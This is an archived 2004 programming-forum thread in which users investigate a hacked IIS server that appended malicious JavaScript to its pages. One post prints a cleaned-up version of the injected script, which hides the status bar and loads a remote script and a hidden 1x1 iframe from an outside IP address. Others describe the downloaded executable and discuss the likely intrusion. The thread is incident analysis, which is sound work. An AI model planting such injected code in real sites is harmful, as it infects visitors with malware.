The Old Joel on Software Forum: Part 5 (of 5)

New IIS Hole?

A friend found his apparently-fully-patched-up IIS box was suddenly serving some extra data on the end of pages, and discovered that the "Document Footer" feature was mysteriously turned on in IIS, with the following text being appended on documents. Has anyone seen this? Is it new, is it old, is it maybe so? Yes it's offtopic from the normal, but it's a heads up if this is a newly emerging vulnerability (I can't find any reference to this technique mentioned anywhere).

<script language="JavaScript"></script>

Dennis Forbes
Tuesday, June 22, 2004

you wacky Canadian bastards.

muppet is now from madebymonkeys.net
Tuesday, June 22, 2004

Eh? No doot, it's aboot time you came down off the ruff and accept the virtues of hockey and beer.

Dennis Forbes
Tuesday, June 22, 2004

It probably doesn't tell you much but searching Google for some of the JavaScript turns up this:- http://www.google.co.uk/search?q=cache:GQq93-Kx2mMJ:www.angusinternational.info/newsroom/AMI_SESSIONS.rtf+Date()%3Bvar+expiry%3Dnew+Date(today.getTime()%2B600000)%3Bif(v8!%3Dnull%26%26v8!%3D%22%22)&hl=en so it seems that someone else has picked it up, whatever it is.

r1ch
Tuesday, June 22, 2004

Hey Dennis,

I cleaned up the code a little bit and renamed it, so that I could try to see what's going on.

It looks like it's checking for a secure connection, then making sure you don't have a specific cookie. If you don't, then it connects to a remote javascript file, and tries to run it in an 1x1 pixel IFrame, all the while blanking out your status so you can't see anything, I'm assuming.

At any rate, I never got the "dot.php" file, so I have no idea what's in it. I'm curious if the "trk716" cookie is some kind of authentication token to even download the script... I have no idea.

At any rate, I can't imagine it's anything *good* going on.

I couldn't find references to it anywhere. Anyway, here's the "cleaner" version, hopefully it comes out ok on the forum.

-------------

var docCookie=document.cookie;

function findCookie(paramToFind)
{
    var ix = docCookie.indexOf(paramToFind + "=");
    if (ix == -1) return null;
    ix=docCookie.indexOf("=",ix)+1;
    var es=docCookie.indexOf(";",ix);

    if (es==-1) es=docCookie.length;
    return unescape(docCookie.substring(ix,es));
}

function createNewCookie(paramName, paramValue)
{
    var today=new Date();
    var expiry=new Date(today.getTime()+600000);

    if (paramValue != null && paramValue != "") document.cookie = paramName + "=" + escape(paramValue) + "; expires=" + expiry.toGMTString();
    docCookie = document.cookie;
}

function BlankStatus()
{
    window.status = "";
    setTimeout("BlankStatus()",200);
}

BlankStatus();

if(location.href.indexOf("https")!=0)
{
    if (findCookie("trk716") == null)
    {
        document.write("<script language=\"JavaScript\" src=\"http://217.107.218.147/dot.php\"></script><iframe src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"no\"/>");
        createNewCookie("trk716","4");
    }
}

Dignified
Tuesday, June 22, 2004

Well the IP looks like it's in Minsk, Russia, so yea I doubt it's very benevolent.

Mr. O
Tuesday, June 22, 2004

That's really strange. I wonder if the box was hacked and not just IIS. What other ports are open? Maybe somebody turned on the footer remotely.

christopher baus (www.baus.net)
Tuesday, June 22, 2004

It's exploiting the swiss cheese like IE through an IFrame exploit. It would be interesting to see the code it's trying to download. Probabably from Russia with love no doubt.

Now the fact that it is found on a supposedly completely patched IIS box doesn't give me the warm fuzzies about Windows' new security religion.

I have a co-worker that got some bho crapware installed in IE. He was on google looking for a map. The page he got was not a map site, it loaded all kinds of good crap. Thinking your safe on the web with IE is a little like thinking sending your daughter to prom with a group of bikers is ok.

unsafe at any speed
Tuesday, June 22, 2004

"Thinking your safe on the web with IE is a little like thinking sending your daughter to prom with a group of bikers is ok."

I hanged out with a group of bikers some years back, and they were OK.

OTOH, I was no one's daughter :)

Paulo Caetano
Tuesday, June 22, 2004

Thank you all for the comments. The method of intrusion is still completely unknown, so it's entirely possible that it was something completely unrelated to IIS where the user then took advantage of IIS while in control. I would guess that, as mentioned above, it's a multifront attack, and the script injected then takes advantage of IE faults to do something else (such as then assaulting other web servers), and so on (because really I've always wondered how IE faults were a problem if you stayed with "trusted sites" [i.e. not browsing warez sites] ... it looks like this is exactly how it's a problem - a trusted sites get hijacked with the fault).

Dennis Forbes
Tuesday, June 22, 2004

One method of intrusion could be an easy-to-guess password, which then allows access using Terminal Server/Remote Desktop, or the PPTP VPN service. Even if your friend believes he has secure passwords, there may be accounts (local or domain) with weak passwords that he was not aware of. E.g., local (as opposed to domain) administrator account, accounts created by backup software...

Just Guessing
Tuesday, June 22, 2004

I downloaded the javascripts that it pulls down... after some redirects it downloads an executable and overwrites windows media player with it. It then launches media player using the mms:// protocol. The exe that it downloads could then of course do pretty much anything. The binary that it downloads doesn't contain any known viruses acording to my virus checker but I'm pretty sure that's what it is.

r1ch
Tuesday, June 22, 2004

What that code does is not immediately as important as finding out the method of exploit so that when the server is rebuilt from scratch it will not be compromised again.

(It will be rebuilt from scratch, right? After this root-level exploit you can't have any confidence in the system's operation. Did someone replace your WinZip with an altered version? Install a trojan? Change obscure settings in your mail server? Etc.)

Just Guessing
Tuesday, June 22, 2004

Not sure if this is related, but a few days ago my shortcut to notepad.exe was replaced with a shortcut to some random exe under c:\windows, and this is on a fully patched machine.

God knows how that happened - Spybot + AntiVirus check fixed a whole pile of crap - here's to hoping that there isn't anything else wrong.

I'm moving to firefox.

a
Tuesday, June 22, 2004

Fellas, fellas

there's no such thing as a new IIS hole. IIS is THE hole. HAR HAR!

Oh yeah!
Tuesday, June 22, 2004

Just Guessing - yes, getting the server secured is important but I guess that the people that visited his website probably would probably want know what they're infected with as well.

r1ch
Tuesday, June 22, 2004

Dennis, why not have your friend turn this info into E-Eye or one of those other security groups that investigate these things (and sometime pull Microsoft's pants down in front of the world). If this is truly new it would be helpful to get a fix.

Mike
Tuesday, June 22, 2004

I suspect there is a bigger chance that the machine had a trojan on it that changed the IIS setting, rather than IIS being vulnerable itself.

Don't Blame Me
Wednesday, June 23, 2004

Didn't hear about any Apache/Linux boxes having this trouble

Troubling
Wednesday, June 23, 2004

As far as I've seen, this only happens to sites that AREN'T patched (or patched but not rebooted). And you should report this to MS in any case so they can constructively get a handle on it vs. "pulling pants down".

wondering
Saturday, June 26, 2004